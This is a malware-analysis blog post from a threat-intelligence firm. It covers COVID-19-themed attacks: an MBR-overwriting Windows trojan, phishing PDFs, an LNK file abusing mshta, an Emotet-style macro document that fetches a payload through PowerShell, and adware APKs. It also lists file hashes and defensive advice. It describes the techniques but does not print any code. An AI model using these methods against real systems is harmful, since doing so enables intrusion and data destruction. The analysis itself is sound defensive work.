In December 2019, COVID-19 was first identified in Wuhan, Hubei Province, China. To date it has had worldwide repercussions, affecting millions of people globally. The pandemic has transformed the lives of people and changed the way we work. On account of the ‘new normal’, organizations worldwide have been compelled to shift to digital means for carrying out their business and sharing critical information. With the adoption of working remotely, businesses are met with critical cybersecurity challenges involving data protection and cloud computing.
The current work-from-home situation has emerged as an opportunity for cybercriminals. When employees and their devices leave the physical boundaries of the office network, they are more susceptible to cyber risks. In addition, attackers are increasingly exploiting the COVID-19 crisis to design customized cyberattack campaigns, including phishing and malware attacks with the pandemic as the threat vector. Since the onset of the pandemic, there has been a marked rise in threat actors sending tailor-made emails containing information related to the virus. These emails contain legitimate-looking information and often ask victims to click on a link. The attackers also use other tactics to redirect their targets to malicious domains that can be further used for launching malware attacks.
With criminal groups increasingly launching COVID-19-themed malware campaigns, the Cyble Research Team has been analyzing some of these malware campaigns. Our research indicates that attackers are using different attack vectors, including malicious pdf files, malwares embedded in LNK files, android malware, and malicious executables presented as documents related to COVID-19. The case studies discussed below present detailed information on these attacks.
CASE 1: Covid-21 Windows Malware
On performing the static analysis of the PE executable file, we found that the application name is shown as “Covid-21 corona virus”.
Figure 1: Product Info given in file properties.
The description contained an interesting string, which we ran in a Virtual environment. The file was found packed with UPX and the timestamp was set to the year 2010.
Figure 2: Static information of the malware sample.
It was interesting to note that the sample shows a pop-up alert once we execute the sample, as shown in the image below.
Figure 3: Alert message after clicking malware sample.
The malware sample also drops multiple files in the Appdata folder with the pop-up alert shown in Fig3.
Figure 4: Malware helper files dropped in Temp folder.
On selecting yes for the execution from the pop-up alert in Fig3, the batch file dropped as Covid21 in Fig4 carries out the primary infection processes. The batch file code analyzed is showcased in the image below.
Figure 5: Covid21.bat file performing various malware operations.
The Covid21.bat file creates a folder “Covid21” as seen in Fig5 and moves all the helper files to this folder. The batch file also executes other malware helper files, disables Task Manager & Windows Defender, along with the option to change wallpapers using registry entries. The Covid21.bat file also modifies the Master Boot Record, which contains the information on each hard drive partition. The batch installer tries to overwrite the MBR file with its own code to lock out users from their system. The execution of PayloadMBR.exe can be seen in the image below.
Figure 6: Execution of the PayloadMBR binary and alert message boxes.
Upon execution of the malware, the wallpaper is modified, and multiple message boxes are displayed on the home screen stating that the computer has been infected with Covid-21 Corona Virus, as seen in the image below.
Figure 7: Changed home screen and message boxes shown after execution of the malware.
The malware claims to be a Trojan, but its primary aim appears to be locking the bootloader and leading to a forced shutdown. After a short interval of time, a blue screen appears on the desktop stating that the system has crashed.
Figure 8: Error message displayed after the execution of the malware.
This malware sample takes an approach directed at complicating the malware analysis process by crashing the Windows kernel. On restarting the system, the message that appears is shown in the image below:
Figure 9: Display screen on restarting the system.
CASE 2: Malicious PDF documents
In the course of our research, we have seen PDF documents being shared by threat actors through phishing campaigns. Attackers send documents related to information on COVID-19, and these documents are tailored to look like legitimate documents being sent from verified sources. The image below is a snapshot from one such malicious pdf documents related to testing results for COVID-19:
Figure 10: Malicious document related to Covid.
Figure 11: PDF reCAPTCHA redirecting to malicious URLs.
The document asks victims for a reCAPTCHA verification. On clicking the checkbox, the document redirects unsuspecting users to a malicious domain.
Figure 12: Redirected Domain
The domain to which users are redirected was inactive at the time of our analysis. These malicious domains are used for financial motives or delivering malicious payloads to the victim’s system. The COVID-19 related document has hardcoded links to various fake documents which are part of the same malware campaign. On clicking these links, the user is redirected to other malicious domains.
Figure 13: Links embedded in Covid related document.
Threat actors are also using social engineering techniques and phishing campaigns to lure victims into opening these malicious documents.
CASE 3: LNK Malware
Recently, there has been significant growth in the number of malware attacks using shortcut files. Threat actors often use phishing emails containing a link to download malicious shortcut files or the LNK files directly embedded into them as attachments. Our research indicates that attackers have been using filenames related to COVID-19 vaccination as a cover to lure targets into opening these malicious LNK files.
On further analysis of one such file, we observed that the LNK file contains a path to the target executable. In our sample, the attackers used a “mshta.exe” file, which is used for opening HTML applications in Windows systems.
The “mshta.exe” is used by attackers to execute malicious “.hta”, Javascript or VBScript files directly. The mshta can execute outside the scope of Internet browsers, enabling these events to bypass browser security settings. We found some interesting strings while analyzing the LNK sample:
Figure 14: Structure & Contents of LNK File
The “Long filename” stores the information based on which the target executable will be used by the LNK file. A relative path for the executable is also mentioned in “Relative Path (UNICODE)”. The “Arguments” string contains the URL of the malicious file, which is executed using the “mshta.exe”. On successful execution of the LNK file, the malicious URL loads the malware into the victim’s system.
CASE 4: Malicious Word document
Attackers are leveraging the COVID-19 crisis to share malware-embedded documents. In one of the instances, we found a word document disguised as a COVID-19 report. Our research indicates that often these documents contain legitimate-looking information on the pandemic, while being embedded with malicious Macros that are used to deliver malware payload on the victim’s system. We analyzed a similar document, as shown below.
Figure 15: Warning related to Macros
The initial analysis of the document shows suspicious indicators. For instance, the document is an “AutoExec”, which allows the automatic execution of macros when the document is opened. The victim has no knowledge of the macros running in the background. We also found some other suspicious behaviors, as shown below.
Figure 16: Presence of a large number of Macros inside document
The document also contains hex-encoded strings. On decoding and filtering one of these functions, it was found to be executing a PowerShell command, as shown below.
Figure 17: PowerShell script downloading malware payload.
The network details also show that the document is sending a GET request to a C&C Server for downloading the payload.
The infection mechanism looks familiar to that of the Emotet malware, and the C&C server is also a known malicious domain related to the Emotet malware.
CASE 5: APK Malware
We have analyzed various APK samples related to COVID-19. Most of the samples were found to be related to Adware campaigns for monetization. Threat actors use applications based on COVID-related news to lure unsuspecting users into installing these apps.
As shown in figure 18, the attacker designed the application in a way to request users to install other third-party applications or load ads to unlock the content of the app:
Figure 18: APK Homepage
On performing static analysis, we found that the main activity of the app starts with the OnCreate method. The method further calls a Web Creation functionality, which loads the WebView of the app store or ads referred from other classes, as shown in figure 19.
Figure 19 WebView page of the apps with user intent
Based on our research, we also found that the application has multiple encrypted strings that are decoded using the AES encryption technique using the decryptString function, as shown in the image below. These encrypted strings could be the URLs for the applications or ad files which are shown in figure 20.
Figure 20 Encrypted strings called according to the thread.
Figure 21 Encryption technique used within the app.
The application is built using multiple SDKs, such as Flurry and Google Ads SDK, which are commonly used by developers for loading ads for getting monetization benefits.
Figure 22 Ads SDK used within the app.
This application was found to be distributed with different names around android app stores. The main goal was to achieve monetary gains by luring users into installing other applications.
We have found multiple malware samples related to COVID-19 being distributed in the wild. In order to protect your systems against these malware attacks, please follow the recommendations we have shared below.
Indicators of Compromise (IOCs):
| SHA-256 Hashes |
| 028daa77f9c1b2ee7031e78cd87dac5c5741397bc947e5481287c47a8299b119 |
| 02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca |
| 071df9fbc7877ff9e1e02e52def1a476d661a26151096cf4294b583d5f4ecd57 |
| 17a41a9ba41c62e3915433d44c543fc2358acd9e897f5d3988d198d7589202ba |
| 18c9eb8ca785ba35c0359b620fbf259eac534a983459c5040ee0e115a968927f |
| 208e89fb766998ab21cbde91b170f04f5833e9d0d69257b3654828d00dc79933 |
| 24469a7f1f33cdecf507824a773814b5f3190c81acaf04d06c168ccbf71b2ee8 |
| 2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d |
| 2bbcef2cf92b3592e44ed056a95dc42021e3699c56c8126144934a4b10fd2a2b |
| 32235954adce6d684eb30095d55e72d37ea558e5460a13f555aa3b8e65f000c8 |
| 35988e06d5138f4cf247c13bff0f038f20c4e49cb95828cc087e2e25cf2fc65b |
| 3d63156060c7568b2c3065820f698fdadb6e48910ec82593a61c306c13f5692c |
| 3fce713782fae80c02e863d9023be941b687bb22be3960d2cd5caf10e2c904ca |
| 53aeae5ee4575585eb3ec40f28c35ac8af237503ccc0c4005c9d54e962295c79 |
| 55ea0b3f16179574ec13c283681b5171a481b8e838e1033d1d7b3318690229fd |
| 607bf68103d9158e576beb6c3a4b287bc5f5283c5871075a532d44efa448b9a0 |
| 67a75548a3b665ecfdae82894af9afd70eea10739504d1a88e332fa55c9dd797 |
| 6888e5b369c22c0232c62877de2d2490e52f5683cf9f446e68b61d77ca96a7c9 |
| 69f044d9039152f50a92b71efc83ee9e68dbee8d5d5509d3f82d7bbbbedcf186 |
| 7add20d7f4a219b346d552673dcf7fb558acd44195cc28eb1450f497cf6da692 |
| 7f800784b00354dd15eee129317a63bd3f7bb25622e898c873603e5b142cbb09 |
| 84d658ad47d3c7d074189653b8322d579095e7f467314ab6386efd52b34cfb95 |
| 87ac4dca1021ffc003e85e6d9bfc11ab6834031a1588e28b8bc7cb6e84274493 |
| 8845fbc5ee53428df871c07814306e4216731f64b11e96890039e58942626514 |
| 88d77d7e2a2bef73c7578d488d0fd9ae3de4de235d5383791f6593842ec32f68 |
| 8d6b7b5ade14966bc8cfc180bf8bcffdde30a53d2e9c997cd29026942f04d3f1 |
| 953b0f8f73ddd7ce527be413e34f111f1ccb9de0d43569c99789cebf43b50804 |
| 96c6697299109e485bc59d2ee44bef5a1a7fbbe93c4173ad692f875e844f4985 |
| a6706614d0da8c58be5ac61af02a29dd4542a4fd130464ee3bec6b26be18416f |
| ab141a0d2a37d415c5adcf07e6c213a9057f9b73c1de41f94b81c8de659203ed |
| c8046cd64b8ac877c08a6b89177c00dff1952682d0b46d9bfa05f8a621c04fae |
| cbd911e37568b3b05f2a8d0d0e1ec34df6793e993de1cf9e5dbd658425a639ab |
| d0f47d778c3b74673d591395ee97f5a854ae261d0668438bc6a0af014a6e2636 |
| d53588c17e782ce4a4a99c075f0dfa15a70b1be74ac33cefa8f3efd2d336d17b |
| d9136776aa622d131192ad6057163be608f8175fd3ceaab3b72380ef4347eeda |
| dae982b9bd7cc2c607fe3eb58aee8c9f231cf42d1f44e77c9f980db6ca2be5f4 |
| dbd68ca42842087ca1f1ab5299b3e0d5f9b4539fe48d0a5f8d553b5f73b7c19e |
| e1a5967a00ab672740cd0427e38e76bd3368a4c53bc5a79d708fd2eb680f9cfa |
| e6eb8fe6c1ec21c147f11dba969b7d0f7db36743bc79778a846d7ff6acc1ba83 |
| eb81dabe9bfd40d53018b0df366ec3270c295df85018dd5ed9684f4952576cbf |
| eea646ef34619407a09ab6249e5fe00219ff367cfd09b95e2e32c82ab2cce98b |
| f17fd9ff93d1b3db6c3e4463d5ca5c11b99827890c58721d2860df75d4323705 |
| f3d8a424133d2017f8f76dca98e8e477925ada8ce4299d549534a9a049f75027 |
| f6cf82813c3619830b648d7677fd1046098453aaafc64c98c75e1f637a9e4136 |
| fe79ed4902c209d55bd37446fc8d4ce7b37f241e85e7d17264051a8cb300fa5e |
Recommendations:
Organizations should implement the following practices to strengthen the security posture of their organization’s systems.
- Check for instances of standard executables executing with the hash of another process.
- Implement multi-factor authentication (MFA), especially for privileged accounts.
- Use separate administrative accounts on different administration workstations.
- Employ Local Administrator Password Solution (LAPS).
- Allow the least privilege to employees on data access.
- Use MFA to secure Remote Desktop Protocol (RDP) and ”jump boxes” for access.
- Secure your endpoints by deploying and maintaining endpoint defense tools.
- Always keep all software up to date.
- Keep antivirus signatures and engines up to date.
- Avoid adding users to the local administrator group unless required.
- Implement a strong password policy and enforce regular password changes.
- Configure a personal firewall on organization workstations to deny unwanted connection requests.
- Deactivate unnecessary services on organization workstations and servers.
About Cyble:
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups to Watch in 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.